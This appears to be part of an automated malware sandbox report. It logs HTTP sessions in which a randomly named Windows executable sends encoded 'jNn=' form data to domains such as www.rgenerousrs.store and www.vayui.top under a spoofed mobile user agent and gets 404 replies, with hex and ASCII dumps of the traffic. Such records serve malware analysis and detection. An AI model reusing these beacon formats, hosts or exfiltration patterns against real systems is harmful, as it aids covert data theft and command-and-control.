                                                                            Data Raw: 6a 4e 6e 3d 32 37 47 45 30 57 34 36 48 49 4c 61 57 4b 46 57 66 71 56 42 72 6a 4b 52 68 57 43 38 69 73 58 5a 4d 39 75 44 32 39 76 4a 2f 68 75 30 51 56 54 38 59 6e 4c 58 6e 43 72 30 74 4c 50 62 4f 6a 6f 50 6e 57 77 34 7a 58 55 38 39 37 46 7a 70 48 46 5a 6a 6b 46 6c 62 4b 43 45 6b 37 34 5a 56 6a 5a 74 73 69 65 2f 55 67 75 74 56 70 4b 62 46 4b 4c 55 4a 65 61 2b 79 41 59 48 6a 52 4f 78 75 35 41 63 5a 71 6c 4a 66 4b 55 53 59 34 71 76 36 2b 77 51 7a 4f 66 5a 43 62 4a 42 77 43 44 66 44 55 6f 31 62 32 75 73 43 38 6d 57 76 31 4a 73 74 70 6e 5a 31 67 45 4a 46 49 55 57 48 69 59 68 62 43 71 65 6e 37 73 36 53 65 51 73 31 39 35 41 67 48 35 35 70 78 30 79 33 72 62 61 73 31 56 48 36 56 73 6c 54 79 52 2b 55 34 70 55 71 37 2b 70 47 63 79 61 46 4a 77 55 61 74 51 46 68 52 6d 36 59 64 74 66 2f 36 5a 35 2b 53 4b 71 58 4b 41 31 57 36 79 79 6d 73 30 50 70 6f 2f 71 74 52 65 59 52 6b 6b 79 66 68 46 42 78 59 45 44 6d 2b 4e 52 33 46 6a 32 45 48 4e 39 43 45 39 77 53 30 59 39 6f 39 37 71 36 69 6d 42 38 75 6c 67 75 69 39 57 33 77 [TRUNCATED]
                                                                            Data Ascii: jNn=27GE0W46HILaWKFWfqVBrjKRhWC8isXZM9uD29vJ/hu0QVT8YnLXnCr0tLPbOjoPnWw4zXU897FzpHFZjkFlbKCEk74ZVjZtsie/UgutVpKbFKLUJea+yAYHjROxu5AcZqlJfKUSY4qv6+wQzOfZCbJBwCDfDUo1b2usC8mWv1JstpnZ1gEJFIUWHiYhbCqen7s6SeQs195AgH55px0y3rbas1VH6VslTyR+U4pUq7+pGcyaFJwUatQFhRm6Ydtf/6Z5+SKqXKA1W6yyms0Ppo/qtReYRkkyfhFBxYEDm+NR3Fj2EHN9CE9wS0Y9o97q6imB8ulgui9W3wa64FtfJGAy7OicV4nvgzBKEHLnYOY5ccDdfTglSey9NhlRWoTdfqCuFQ7S/i84Qc8r+coxpo6GoLl+KiDhQxHf/1tehz0+tKDmH6reacfYvdAtUWsAmq/2JPp2PDuv9oJUrJtIJ9o6GxodcZ8nL+DdsGezhu5ZzCy19wT3HGaCd58BZkk7J2ySOGLo1qTqJCQ0EH8LEIarPTN22i1sfoYaHxMpvBj/SBjsxp8/k9Z1vSdZkKcKyear6ftJcEe2OW1MOkeTe569NvKjcqWaRSZBo0fJUj43fx52o96iX14gGTNfDeacM/iE5EUZkb2XXB+XvEX6wK9P98kf1pTxCUjuQwFEJsbHNX/yRPYEGhoeLtAEcmc1RXxCNUrJs3z8JarbTb3BC798LRFVOj0IlzUs4JIksY3i4hxoUN9Ej2b3CykRszXog7qMFPsBU/MlmygQDb3XrnqSQcFbSyrvf6OB01wRkO2CHvIRKADHaRH+hs4EjwHBYz3VExqPqFbMj7kn6Bvg2Sjf4t8frLst0HF6XVtqtbKiEr2z3efWY+vkKc+2kaAPtupWb6B/9BuFZt+6ujCeKSrJGVT+alQw62N5JcFuZXGSVmOv1LhLXuDUjHUt30TsfL5MvQZTb/f//Fa2l6zzHKXozHVKcXJwNpUUTIk2pCfaO4pY [TRUNCATED]
                                                                            Jan 11, 2025 03:32:14.683618069 CET909INHTTP/1.1 404 Not Found
                                                                            Date: Sat, 11 Jan 2025 02:32:14 GMT
                                                                            Content-Type: text/html
                                                                            Transfer-Encoding: chunked
                                                                            Connection: close
                                                                            cf-cache-status: DYNAMIC
                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=OY16Brr0AgkwysVM%2BDM%2FBWfwLR3vSZem4EL4kHPhJaaLtz803TxVr4fjOTky6g2QgAo8W8M992RgaGh3i8ia9AsE70ctgq%2BC%2F3qTUHZBVScLW9VUqL3aLikHAhnxP9zf"}],"group":"cf-nel","max_age":604800}
                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                            Server: cloudflare
                                                                            CF-RAY: 90017ec27d2b0f8f-EWR
                                                                            Content-Encoding: gzip
                                                                            alt-svc: h3=":443"; ma=86400
                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1468&min_rtt=1468&rtt_var=734&sent=1&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=1779&delivery_rate=0&cwnd=230&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                            Data Raw: 36 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 f0 72 d9 24 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 19 86 76 36 fa 50 69 90 d9 45 76 30 c5 79 e9 99 79 15 c8 72 fa 30 d3 f4 a1 2e 01 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                                            Data Ascii: 6d(HML),I310Q/Qp/Kr$T";Ctv6PiEv0yyr0.a30


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            22192.168.2.849734104.21.95.160805960C:\Program Files (x86)\qguwwOAnqKiEBjpxsRJEziZuPrAOIlOOiJiETDzsUojyv\LbtMpScwNRqrVB.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Jan 11, 2025 03:32:16.624221087 CET487OUTGET /vg0z/?jNn=75uk3ictCfC5d95jc9ErhxuZnXjbt/7lQbKW3bXizAnaAV7ibEnK2RjZpZGGD2cxunkBvA8A/q4ys0sLjHkTGqSKo7wbbDBvpzyjUmzrS97fS4i7YPii/B0AmEK1pqpQFw==&3P=ZxaxIFQ HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Language: en-US
                                                                            Host: www.vayui.top
                                                                            Connection: close
                                                                            User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                                                                            Jan 11, 2025 03:32:17.220102072 CET923INHTTP/1.1 404 Not Found
                                                                            Date: Sat, 11 Jan 2025 02:32:17 GMT
                                                                            Content-Type: text/html
                                                                            Transfer-Encoding: chunked
                                                                            Connection: close
                                                                            cf-cache-status: DYNAMIC
                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=E4%2B09MgFYcWAG5J8mNztaSHuhAS%2BUXSaIHMNKNC3fLXjktZ%2BS5aLCQtf78CZeb6Ze5ZnlEcUJ9eGpRmA6SWwfYH76NOyUHQt4CSoI%2F%2BTDYUKw3oQf2tofayg9wGQbRkc"}],"group":"cf-nel","max_age":604800}
                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                            Server: cloudflare
                                                                            CF-RAY: 90017ed26b616a55-EWR
                                                                            alt-svc: h3=":443"; ma=86400
                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1535&min_rtt=1535&rtt_var=767&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=487&delivery_rate=0&cwnd=233&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                            Data Raw: 39 32 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a
                                                                            Data Ascii: 92<html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>0


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            23192.168.2.849735188.114.97.3805960C:\Program Files (x86)\qguwwOAnqKiEBjpxsRJEziZuPrAOIlOOiJiETDzsUojyv\LbtMpScwNRqrVB.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Jan 11, 2025 03:32:22.275620937 CET766OUTPOST /o362/ HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Accept-Language: en-US
                                                                            Host: www.rgenerousrs.store
                                                                            Origin: http://www.rgenerousrs.store
                                                                            Referer: http://www.rgenerousrs.store/o362/
                                                                            Cache-Control: no-cache
                                                                            Content-Length: 204
                                                                            Connection: close
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                                                                            Data Raw: 6a 4e 6e 3d 49 59 6c 6f 75 59 72 49 30 79 51 6c 31 55 68 6a 62 68 72 57 67 39 41 34 58 57 34 61 44 41 62 58 74 63 71 51 5a 32 63 44 62 33 70 41 76 76 5a 68 32 2f 72 54 39 2b 57 61 53 58 4a 75 38 48 30 38 6e 46 68 30 5a 43 7a 68 32 4d 5a 71 34 34 67 2b 73 4d 48 76 41 33 6d 33 37 6a 2b 4f 41 77 52 69 47 68 6b 59 33 4f 72 46 66 7a 55 6d 72 55 4b 66 61 6c 44 63 36 44 4f 6c 56 55 65 67 39 63 46 42 6c 4f 6b 58 34 66 77 32 78 6f 36 41 56 43 61 4e 5a 52 6f 43 4d 43 5a 35 61 4a 58 71 6d 67 48 4e 6d 37 67 33 5a 54 6e 6d 72 67 2f 4e 78 65 55 47 34 65 52 41 31 6f 37 76 54 47 66 4e 66 6c 6c 39 67 66 48 4f 6c 58 45 3d
                                                                            Data Ascii: jNn=IYlouYrI0yQl1UhjbhrWg9A4XW4aDAbXtcqQZ2cDb3pAvvZh2/rT9+WaSXJu8H08nFh0ZCzh2MZq44g+sMHvA3m37j+OAwRiGhkY3OrFfzUmrUKfalDc6DOlVUeg9cFBlOkX4fw2xo6AVCaNZRoCMCZ5aJXqmgHNm7g3ZTnmrg/NxeUG4eRA1o7vTGfNfll9gfHOlXE=
                                                                            Jan 11, 2025 03:32:23.034081936 CET1104INHTTP/1.1 404 Not Found
                                                                            Date: Sat, 11 Jan 2025 02:32:22 GMT
                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                            Transfer-Encoding: chunked
                                                                            Connection: close
                                                                            Vary: Accept-Encoding
                                                                            cf-cache-status: DYNAMIC
                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LQJUFn2ysBWSq%2FkbYxs9KHa05nO%2Fhqtq5JuaY7%2BG1YqK%2FFw8x%2BtrmHEViHoNM2Xo067RpJbE5ZoWSljrDizrFfaEtCDQAtJfy0i6z6rJ%2BgthntL0loS8KykX%2B0SfK%2B6giIL4GqCZwwI%3D"}],"group":"cf-nel","max_age":604800}
                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                            Server: cloudflare
                                                                            CF-RAY: 90017ef5b9192394-EWR
                                                                            Content-Encoding: gzip
                                                                            alt-svc: h3=":443"; ma=86400
                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1970&min_rtt=1970&rtt_var=985&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=766&delivery_rate=0&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                            Data Raw: 66 30 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4c 8f c1 4e c3 30 10 44 ef fe 8a a5 27 38 e0 4d ab 54 e2 b0 b2 44 9b 54 54 0a 25 02 e7 c0 d1 d4 0b 8e 54 e2 60 3b 04 fe 1e 25 15 52 af 33 6f 46 33 74 55 3c 6d f5 6b 5d c2 83 7e ac a0 6e 36 d5 7e 0b 8b 5b c4 7d a9 77 88 85 2e ce ce 4a 66 88 e5 61 a1 04 b9 f4 79 52 e4 d8 58 25 28 b5 e9 c4 2a cf 72 38 f8 04 3b 3f 74 96 f0 2c 0a c2 19 a2 37 6f 7f a7 dc 52 5d 30 6e a9 04 f5 4a 3b 86 c0 5f 03 c7 c4 16 9a e7 0a 46 13 a1 f3 09 de 27 0e 7c 07 c9 b5 11 22 87 6f 0e 92 b0 9f 9a 82 12 64 ac 0d 1c a3 ba ef cd d1 31 ae 64 2e d7 6b b8 6e ba f6 e7 06 5e 66 1c 4c 82 71 1c 65 f8 e0 8e 83 1f 62 88 32 26 1f 18 6a 1f 12 dc 65 84 ff 2d 82 70 9e 49 38 df fb 03 00 00 ff ff e3 02 00 db 2a cd 17 19 01 00 00 0d 0a 30 0d 0a 0d 0a
                                                                            Data Ascii: f0LN0D'8MTDTT%T`;%R3oF3tU<mk]~n6~[}w.JfayRX%(*r8;?t,7oR]0nJ;_F'|"od1d.kn^fLqeb2&je-pI8*0


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            24192.168.2.849736188.114.97.3805960C:\Program Files (x86)\qguwwOAnqKiEBjpxsRJEziZuPrAOIlOOiJiETDzsUojyv\LbtMpScwNRqrVB.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Jan 11, 2025 03:32:24.837517023 CET786OUTPOST /o362/ HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Accept-Language: en-US
                                                                            Host: www.rgenerousrs.store
                                                                            Origin: http://www.rgenerousrs.store
                                                                            Referer: http://www.rgenerousrs.store/o362/
                                                                            Cache-Control: no-cache
                                                                            Content-Length: 224
                                                                            Connection: close
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                                                                            Data Raw: 6a 4e 6e 3d 49 59 6c 6f 75 59 72 49 30 79 51 6c 7a 31 52 6a 5a 47 48 57 73 4e 41 35 64 32 34 61 4a 67 61 63 74 63 6d 51 5a 30 77 54 59 42 35 41 76 4c 4a 68 31 36 48 54 2b 2b 57 61 5a 33 4a 52 7a 6e 31 52 6e 46 73 4a 5a 48 54 68 32 4d 6c 71 34 34 77 2b 74 2f 76 73 44 48 6d 35 77 44 2b 4d 4f 51 52 69 47 68 6b 59 33 4f 50 38 66 33 34 6d 72 6b 61 66 62 41 76 62 33 6a 4f 69 57 55 65 67 71 4d 46 46 6c 4f 6b 6c 34 64 46 54 78 75 2b 41 56 47 4b 4e 59 41 6f 42 47 43 5a 7a 58 70 57 75 6c 54 44 48 75 49 59 6c 62 43 66 5a 75 7a 37 73 35 49 6c 73 69 38 5a 47 32 6f 54 45 54 46 33 37 61 53 34 56 36 38 58 2b 37 41 52 49 58 2b 4c 68 37 64 6c 55 33 64 69 6d 36 4d 41 6e 6d 38 64 61
                                                                            Data Ascii: jNn=IYlouYrI0yQlz1RjZGHWsNA5d24aJgactcmQZ0wTYB5AvLJh16HT++WaZ3JRzn1RnFsJZHTh2Mlq44w+t/vsDHm5wD+MOQRiGhkY3OP8f34mrkafbAvb3jOiWUegqMFFlOkl4dFTxu+AVGKNYAoBGCZzXpWulTDHuIYlbCfZuz7s5Ilsi8ZG2oTETF37aS4V68X+7ARIX+Lh7dlU3dim6MAnm8da
                                                                            Jan 11, 2025 03:32:25.593369007 CET1096INHTTP/1.1 404 Not Found
                                                                            Date: Sat, 11 Jan 2025 02:32:25 GMT
                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                            Transfer-Encoding: chunked
                                                                            Connection: close
                                                                            Vary: Accept-Encoding
                                                                            cf-cache-status: DYNAMIC
                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mWxO7Sd32UzVCZ2kFvXHtmYu8vBvniSi%2B%2F8iSkx0pjlqBTgs6fXJ8dpelLXn2X5VpyIm56XsR2THPQwulnhKWtpFGiteuarT5NqgEepPMpZwXnzykEE1LIDk5nqg09DXM818gU9Phys%3D"}],"group":"cf-nel","max_age":604800}
                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                            Server: cloudflare
                                                                            CF-RAY: 90017f05ab61334e-EWR
                                                                            Content-Encoding: gzip
                                                                            alt-svc: h3=":443"; ma=86400
                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1964&min_rtt=1964&rtt_var=982&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=786&delivery_rate=0&cwnd=30&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                            Data Raw: 65 35 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4c 8f c1 4e c3 30 10 44 ef fe 8a a5 27 38 e0 4d ab 54 e2 b0 b2 44 9b 54 54 0a 25 02 e7 c0 d1 d4 0b 8e 54 e2 60 3b 04 fe 1e 25 15 52 af 33 6f 46 33 74 55 3c 6d f5 6b 5d c2 83 7e ac a0 6e 36 d5 7e 0b 8b 5b c4 7d a9 77 88 85 2e ce ce 4a 66 88 e5 61 a1 04 b9 f4 79 52 e4 d8 58 25 28 b5 e9 c4 2a cf 72 38 f8 04 3b 3f 74 96 f0 2c 0a c2 19 a2 37 6f 7f a7 dc 52 5d 30 6e a9 04 f5 4a 3b 86 c0 5f 03 c7 c4 16 9a e7 0a 46 13 a1 f3 09 de 27 0e 7c 07 c9 b5 11 22 87 6f 0e 92 b0 9f 9a 82 12 64 ac 0d 1c a3 ba ef cd d1 31 ae 64 2e d7 6b b8 6e ba f6 e7 06 5e 66 1c 4c 82 71 1c 65 f8 e0 8e 83 1f 62 88 32 26 1f 18 6a 1f 12 dc 65 84 ff 2d 82 70 9e 49 38 df fb 03 00 00 ff ff 0d 0a 62 0d 0a e3 02 00 db 2a cd 17 19 01 00 00 0d 0a 30 0d 0a 0d 0a
                                                                            Data Ascii: e5LN0D'8MTDTT%T`;%R3oF3tU<mk]~n6~[}w.JfayRX%(*r8;?t,7oR]0nJ;_F'|"od1d.kn^fLqeb2&je-pI8b*0


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            25192.168.2.849737188.114.97.3805960C:\Program Files (x86)\qguwwOAnqKiEBjpxsRJEziZuPrAOIlOOiJiETDzsUojyv\LbtMpScwNRqrVB.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Jan 11, 2025 03:32:27.378837109 CET1803OUTPOST /o362/ HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Accept-Language: en-US
                                                                            Host: www.rgenerousrs.store
                                                                            Origin: http://www.rgenerousrs.store
                                                                            Referer: http://www.rgenerousrs.store/o362/
                                                                            Cache-Control: no-cache
                                                                            Content-Length: 1240
                                                                            Connection: close
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                                                                            Data Raw: 6a 4e 6e 3d 49 59 6c 6f 75 59 72 49 30 79 51 6c 7a 31 52 6a 5a 47 48 57 73 4e 41 35 64 32 34 61 4a 67 61 63 74 63 6d 51 5a 30 77 54 59 42 78 41 76 38 68 68 32 5a 66 54 2f 2b 57 61 48 48 4a 55 7a 6e 31 70 6e 46 30 4e 5a 48 58 78 32 4b 68 71 34 65 38 2b 71 4f 76 73 59 33 6d 35 2f 6a 2b 42 41 77 51 34 47 68 30 44 33 4f 66 38 66 33 34 6d 72 69 57 66 50 6c 44 62 6b 54 4f 6c 56 55 66 76 39 63 46 74 6c 4f 74 53 34 64 41 6d 32 65 65 41 4d 6d 61 4e 56 53 77 42 4b 43 5a 31 5a 4a 57 49 6c 55 4b 64 75 4d 34 2b 62 43 37 7a 75 7a 44 73 70 4f 49 61 6c 50 67 52 73 4b 54 4c 59 6e 54 4f 42 6a 73 61 35 4f 6e 73 32 77 70 4a 51 36 48 62 30 39 35 56 36 65 2f 70 34 74 46 30 74 6f 30 55 77 33 33 51 67 71 46 46 57 4c 34 50 36 7a 66 48 4c 6a 66 66 70 45 6c 2b 41 65 53 38 52 44 67 6c 63 61 77 61 59 6d 7a 70 53 57 79 65 5a 35 6b 41 68 74 77 43 78 51 79 6a 4a 75 79 54 69 65 73 37 66 34 4f 70 62 50 32 6d 72 43 77 73 79 6c 4d 71 62 66 36 48 49 70 43 51 52 48 71 37 77 59 2f 4a 2f 55 53 57 79 64 50 6a 4e 76 34 70 55 61 32 6a 74 68 [TRUNCATED]
                                                                            Data Ascii: jNn=IYlouYrI0yQlz1RjZGHWsNA5d24aJgactcmQZ0wTYBxAv8hh2ZfT/+WaHHJUzn1pnF0NZHXx2Khq4e8+qOvsY3m5/j+BAwQ4Gh0D3Of8f34mriWfPlDbkTOlVUfv9cFtlOtS4dAm2eeAMmaNVSwBKCZ1ZJWIlUKduM4+bC7zuzDspOIalPgRsKTLYnTOBjsa5Ons2wpJQ6Hb095V6e/p4tF0to0Uw33QgqFFWL4P6zfHLjffpEl+AeS8RDglcawaYmzpSWyeZ5kAhtwCxQyjJuyTies7f4OpbP2mrCwsylMqbf6HIpCQRHq7wY/J/USWydPjNv4pUa2jthQ9+xx4mXXL/bshwJeHaFw3A5TkOsGrXBx1nCH6pn4il7krw0YylXZi9FgDO6Uv3pCatX3Z/euGrirh+BLh6eaTLzz1VDPgbCaO6GWzoarTUxcGURuNuFeTayzZ1sy4dsUMOLqDFjirPW/LktnM+63Bp/0wcxmFmjoMfSNQO0UFy7bCUJFwS11uE0ckC2Tn+r8o0Bvnh9wjAOi3n3moHOgJ/SNexT67HUHfY4GJZ2w7xj+qmE0uXuIecpua3etpsQM4Jclez2cl74Xc6eHXhStZ1Am56aUmPaWZ3+bljaD2DiWa42BDxN81fk7d7CqFAjHuaKHfLgx8xBkgmn4KUe2da38EV8lJVUIu9rD8f+pZaJEsT3/aKhlylpB/eUg0E81NDDMuevyTqv2ZmongWBBXXnFwLBrxAfHogO4AR/R/1rS+oGYROQKM1t17ydykh2+5iqaBPHFaNRYW+jbo4jwo56/TA9P9215Q+r2QK9y9nwFRdDRp7f/ZrUovhN458fG5gw5BH2mvp9fAwfwIETV/h9A3zpH1HKysivdR4pXtJ/feN89U2+WfXSa5rqZd/IwDnvslbIqr/54jN/fYaJViMgWvDf3Pln+EW216Tc8SDTfA/Tpjk0Y/bDAUnR51OS/1Bn9R7+mPTdBQlAqqkmDH7fl0lnzBI6LG [TRUNCATED]
                                                                            Jan 11, 2025 03:32:28.124409914 CET1099INHTTP/1.1 404 Not Found
                                                                            Date: Sat, 11 Jan 2025 02:32:28 GMT
                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                            Transfer-Encoding: chunked
                                                                            Connection: close
                                                                            Vary: Accept-Encoding
                                                                            cf-cache-status: DYNAMIC
                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=k%2F287T8cH1w00yYo3ZmhBPc30vknL7YQRDptOjLxPbAeS%2FkzqTzg7d32sZPQcYffsicCkkE%2Bu8h9SyTpFBRzvnMVuDGfcFf4X%2Fezl3V8FUmD6x2QCcDo4KwrZqEu%2F11Mo9XRDUUmpJo%3D"}],"group":"cf-nel","max_age":604800}
                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                            Server: cloudflare
                                                                            CF-RAY: 90017f158ef042ee-EWR
                                                                            Content-Encoding: gzip
                                                                            alt-svc: h3=":443"; ma=86400
                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1747&min_rtt=1747&rtt_var=873&sent=1&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=1803&delivery_rate=0&cwnd=216&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                            Data Raw: 66 30 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4c 8f c1 4e c3 30 10 44 ef fe 8a a5 27 38 e0 4d ab 54 e2 b0 b2 44 9b 54 54 0a 25 02 e7 c0 d1 d4 0b 8e 54 e2 60 3b 04 fe 1e 25 15 52 af 33 6f 46 33 74 55 3c 6d f5 6b 5d c2 83 7e ac a0 6e 36 d5 7e 0b 8b 5b c4 7d a9 77 88 85 2e ce ce 4a 66 88 e5 61 a1 04 b9 f4 79 52 e4 d8 58 25 28 b5 e9 c4 2a cf 72 38 f8 04 3b 3f 74 96 f0 2c 0a c2 19 a2 37 6f 7f a7 dc 52 5d 30 6e a9 04 f5 4a 3b 86 c0 5f 03 c7 c4 16 9a e7 0a 46 13 a1 f3 09 de 27 0e 7c 07 c9 b5 11 22 87 6f 0e 92 b0 9f 9a 82 12 64 ac 0d 1c a3 ba ef cd d1 31 ae 64 2e d7 6b b8 6e ba f6 e7 06 5e 66 1c 4c 82 71 1c 65 f8 e0 8e 83 1f 62 88 32 26 1f 18 6a 1f 12 dc 65 84 ff 2d 82 70 9e 49 38 df fb 03 00 00 ff ff e3 02 00 db 2a cd 17 19 01 00 00 0d 0a 30 0d 0a 0d 0a
                                                                            Data Ascii: f0LN0D'8MTDTT%T`;%R3oF3tU<mk]~n6~[}w.JfayRX%(*r8;?t,7oR]0nJ;_F'|"od1d.kn^fLqeb2&je-pI8*0


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            26192.168.2.849738188.114.97.3805960C:\Program Files (x86)\qguwwOAnqKiEBjpxsRJEziZuPrAOIlOOiJiETDzsUojyv\LbtMpScwNRqrVB.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Jan 11, 2025 03:32:29.923579931 CET495OUTGET /o362/?3P=ZxaxIFQ&jNn=FaNItuPk5TcZ9HdRFxGis99OVV5mBzvNwqypTl8+VCtQ49ZNgIXGwO2PY0xc/TpBxHoMd3n/rLst/5dAk+rqD1uW41+CEwYhbzlB+9nxdj867jKwdHPO1yv4Ykeg9vUq/A== HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Language: en-US
                                                                            Host: www.rgenerousrs.store
                                                                            Connection: close
                                                                            User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                                                                            Jan 11, 2025 03:32:30.683577061 CET1117INHTTP/1.1 404 Not Found
                                                                            Date: Sat, 11 Jan 2025 02:32:30 GMT
                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                            Transfer-Encoding: chunked
                                                                            Connection: close
                                                                            Vary: Accept-Encoding
                                                                            cf-cache-status: DYNAMIC
                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BAzwjkMM9rm2er2wRcJjgkkLF7Kh2HMqNKClCBm7gmxZBG6R%2BBrezs0qbOvf%2BYZDVCDXgG%2FthxSbLOnP%2BKRF3oTE3%2BMAmtkgzp5Dt1EHCD%2BK0y3mvpsuFKdqsh21ikgQdmTGQ3Wquo4%3D"}],"group":"cf-nel","max_age":604800}
                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                            Server: cloudflare
                                                                            CF-RAY: 90017f256cfac35e-EWR
                                                                            alt-svc: h3=":443"; ma=86400
                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1637&min_rtt=1637&rtt_var=818&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=495&delivery_rate=0&cwnd=76&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
